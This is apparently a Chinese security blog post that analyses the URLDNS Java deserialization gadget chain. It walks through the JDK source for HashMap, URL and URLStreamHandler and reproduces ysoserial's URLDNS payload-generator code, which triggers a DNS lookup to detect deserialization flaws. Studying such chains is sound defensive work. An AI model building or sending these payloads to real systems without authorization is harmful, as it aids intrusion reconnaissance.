【Java安全】反序列化-URLDNS链分析
简单分析下URLDNS链
分析
出问题的类是HashMap,直奔HashMap的readobject方法
其最后一段代码是不断读取K、V,然后将键值对放入HashMap中
// Read the keys and values, and put the mappings in the HashMap
for (int i = 0; i < mappings; i++) {
@SuppressWarnings("unchecked")
K key = (K) s.readObject();
@SuppressWarnings("unchecked")
V value = (V) s.readObject();
putVal(hash(key), key, value, false, false);
}
进入hash(key),查看到如下代码:
如果key不是null,会执行hashCode方法
static final int hash(Object key) {
int h;
return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
}
然后可以思考哪个类覆写了hashcode方法,并且可以拿来利用?
java.net.URL的hashcode方法如下:(注意hashcode必须为-1才会进入后面的语句)
public synchronized int hashCode() {
if (hashCode != -1)
return hashCode;
hashCode = handler.hashCode(this);
return hashCode;
}
handle定义如下,为URLStreamHandler的子类
transient URLStreamHandler handler;
跟进handle的hashCode方法:
发现第二段代码,执行了getHostAddress操作
protected int hashCode(URL u) {
int h = 0;
// Generate the protocol part.
String protocol = u.getProtocol();
if (protocol != null)
h += protocol.hashCode();
// Generate the host part.
InetAddress addr = getHostAddress(u);
if (addr != null) {
h += addr.hashCode();
} else {
String host = u.getHost();
if (host != null)
h += host.toLowerCase().hashCode();
}
// Generate the file part.
String file = u.getFile();
if (file != null)
h += file.hashCode();
// Generate the port part.
if (u.getPort() == -1)
h += getDefaultPort();
else
h += u.getPort();
// Generate the ref part.
String ref = u.getRef();
if (ref != null)
h += ref.hashCode();
return h;
}
跟进getHostAddress
protected synchronized InetAddress getHostAddress(URL u) {
if (u.hostAddress != null)
return u.hostAddress;
String host = u.getHost();
if (host == null || host.equals("")) {
return null;
} else {
try {
u.hostAddress = InetAddress.getByName(host);
} catch (UnknownHostException ex) {
return null;
} catch (SecurityException se) {
return null;
}
}
return u.hostAddress;
}
try代码块中的InetAddress.getByName是根据host获取其ip,网络上就是一次dns查询,因此可以用dnslog看是否收到请求来判断是否存在反序列化漏洞。
利用链如下:
HashMap->readObject()
HashMap->hash()
URL->hashCode()
URLStreamHandler->hashCode()
URLStreamHandler->getHostAddress()
InetAddress->getByName()
利用
因此利用方式就很简单了,首先创建一个HashMap实例和URL实例,URL实例放入HashMap中,再通过反射修改URL实例的hashCode字段为-1(放入HashMap时会计算其hashCode,从而改变其值),再对HashMap进行序列化即可。
再看ysoserial生成的payload:
其写了一个SilentURLStreamHandler继承URLStreamHandler以覆盖默认的URLStreamHandler,目的是在生成payload时不触发dns请求,这个步骤是可选的,生成payload过程和分析的一致。
public class URLDNS implements ObjectPayload<Object> {
public Object getObject(final String url) throws Exception {
URLStreamHandler handler = new SilentURLStreamHandler();
HashMap ht = new HashMap(); // HashMap that will contain the URL
URL u = new URL(null, url, handler); // URL to use as the Key
ht.put(u, url);
Reflections.setFieldValue(u, "hashCode", -1);
return ht;
}
public static void main(final String[] args) throws Exception {
PayloadRunner.run(URLDNS.class, args);
}
static class SilentURLStreamHandler extends URLStreamHandler {
protected URLConnection openConnection(URL u) throws IOException {
return null;
}
protected synchronized InetAddress getHostAddress(URL u) {
return null;
}
}
}
参考:
P神Java安全漫谈 - 08.反序列列化篇(2)
https://mp.weixin.qq.com/s/UfDC0usYgxtpsF0VGqLseA